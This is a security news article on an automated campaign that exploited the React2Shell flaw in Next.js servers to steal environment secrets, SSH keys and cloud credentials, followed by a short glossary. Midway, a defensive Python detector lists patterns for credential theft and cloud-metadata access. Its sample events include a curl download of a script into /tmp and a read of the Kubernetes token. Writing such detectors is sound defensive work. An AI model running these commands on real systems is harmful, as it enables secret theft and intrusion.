Next.js Under Siege: Automated Hackers Ransack 700+ Servers in Credential Heist
A critical React2Shell flaw fuels a lightning-fast global breach, exposing cloud secrets and payment keys as attackers automate the hunt for vulnerable Next.js apps.
The digital world was rocked this week as a wave of stealthy cyberattacks swept across the globe, targeting web servers built on the popular Next.js framework. In a matter of hours, an organized threat group leveraged a newly discovered vulnerability - dubbed React2Shell - to crack open more than 700 servers, siphoning off a trove of sensitive credentials and cloud secrets. For businesses relying on modern web stacks, the incident is a wake-up call: the automation of hacking has reached terrifying new heights.
The Anatomy of a High-Speed Hack
The campaign, tracked as UAT-10608 by Cisco Talos researchers, didn’t rely on human hackers manually probing for weaknesses. Instead, it weaponized automation - scanning the internet for Next.js applications with exposed server endpoints vulnerable to the React2Shell flaw. This bug, officially cataloged as CVE-2025-55182, lurks in React Server Components and allows attackers to execute code on the server simply by sending specially crafted data - no login or prior access required.
Once a target was found, the attack chain triggered automatically. A small script landed in the server’s temporary directory, fetching a more sophisticated multi-stage tool. This tool worked methodically: first stealing environment variables (often rich with secrets), then hunting for Kubernetes tokens, shell command histories, and even cloud provider metadata from AWS, Google Cloud, and Azure. In some cases, it mapped running Docker containers and internal dashboards, setting the stage for deeper compromise.
All stolen data was quietly exfiltrated to attacker-controlled infrastructure and organized using a slick web interface dubbed NEXUS Listener. Researchers found a misconfigured instance that laid bare the scale of the breach - 766 hosts compromised in a single day, with a buffet of credentials neatly categorized and ready for further exploitation.
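As an added illustration (not code from the article or from Cisco Talos), the following Python flags the post-exploitation chain described above in process-execution telemetry: children of a Next.js server process that download into a temp directory, read the Kubernetes service-account token, shell history or another process's environment, or contact the cloud metadata address. The JSON-lines event format, the process names and the sample events are constructed assumptions; 169.254.169.254 is the link-local metadata address shared by AWS, GCP and Azure.

```python
import json
import re

# Constructed sample process-exec events (JSON per line), not taken from the article.
SAMPLE_EVENTS = [
    '{"pid":4120,"ppid":1,"comm":"node","cmd":"node server.js"}',
    '{"pid":4131,"ppid":4120,"comm":"sh","cmd":"sh -c curl -s http://203.0.113.7/s1.sh -o /tmp/s1.sh"}',
    '{"pid":4135,"ppid":4131,"comm":"cat","cmd":"cat /var/run/secrets/kubernetes.io/serviceaccount/token"}',
    '{"pid":4136,"ppid":4131,"comm":"curl","cmd":"curl -s http://169.254.169.254/"}',
    '{"pid":4140,"ppid":4120,"comm":"sh","cmd":"sh -c npm run build"}',   # benign child, must not fire
]

WEB_PROCS = {"node", "next-server"}   # names a Next.js server process runs under (assumed)
METADATA_IP = "169.254.169.254"       # link-local metadata address used by AWS, GCP and Azure

# Detection rules: (name, regex over the child's full command line). Each maps to a
# collection step the campaign was reported to perform after the initial foothold.
RULES = [
    ("downloader-into-temp-dir", re.compile(r"\b(curl|wget)\b.*(/tmp/|/var/tmp/|/dev/shm/)")),
    ("k8s-serviceaccount-token", re.compile(r"/var/run/secrets/kubernetes\.io/serviceaccount/token")),
    ("shell-history-read", re.compile(r"\.(bash|zsh)_history\b")),
    ("process-environ-read", re.compile(r"/proc/\d+/environ")),
    ("cloud-metadata-access", re.compile(re.escape(METADATA_IP))),
]

def parse_events(lines):
    """Map pid -> event for one JSON object per line."""
    return {ev["pid"]: ev for ev in map(json.loads, lines)}

def descends_from_web_process(pid, events, max_depth=16):
    """Walk the parent chain from pid; True if a web-server process is an ancestor."""
    for _ in range(max_depth):
        ev = events.get(pid)
        if ev is None:
            return False
        if ev["comm"] in WEB_PROCS:
            return True
        pid = ev["ppid"]
    return False

def detect(lines):
    """Return (pid, rule-name) pairs for web-server descendants that match a rule."""
    events = parse_events(lines)
    hits = []
    for pid, ev in events.items():
        if ev["comm"] in WEB_PROCS or not descends_from_web_process(ev["ppid"], events):
            continue
        hits.extend((pid, name) for name, rx in RULES if rx.search(ev["cmd"]))
    return hits
```

Each hit names the child pid, so an analyst can pivot back to the Next.js process and the request logs from the same window.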
Why This Breach Matters
The numbers are staggering: over 90% of breached servers gave up their database credentials, while more than three-quarters exposed private SSH keys - effectively handing attackers the keys to the kingdom for lateral movement. Dozens of victims lost live payment processor keys (Stripe), and many saw their GitHub, OpenAI, and Azure credentials scooped up.
The UAT-10608 campaign is a stark reminder of the dangers posed by deserialization vulnerabilities in modern frameworks - and how quickly attackers can capitalize on unpatched systems. Organizations using Next.js must act fast: audit deployments, apply patches, and rotate all potentially exposed secrets before attackers return for round two.
Looking Forward: Can Automation Be Stopped?
The speed and precision of the React2Shell campaign have set a new benchmark for automated cybercrime. As attackers continue to industrialize their methods, defenders must match their pace. The race is on - not just to patch, but to rethink how we secure the interconnected web.
WIKICROOK
- Remote Code Execution (RCE): An attacker runs their own code on a victim’s system, often gaining full control of it.
- Deserialization: Deserialization turns serialized data back into live program objects. If the input is not validated, attackers can smuggle harmful instructions into the application through it.
- Environment Variables: Environment variables are settings stored in a program’s runtime environment; they often hold sensitive configuration such as passwords or API keys used by programs and servers.
- SSH Key: An SSH key is a digital credential that enables secure, passwordless access to remote servers. If compromised, it can allow unauthorized system access.
- API Key: An API key is a unique code that lets programs access data or services. If it leaks, whoever holds it can use those services as the legitimate program would.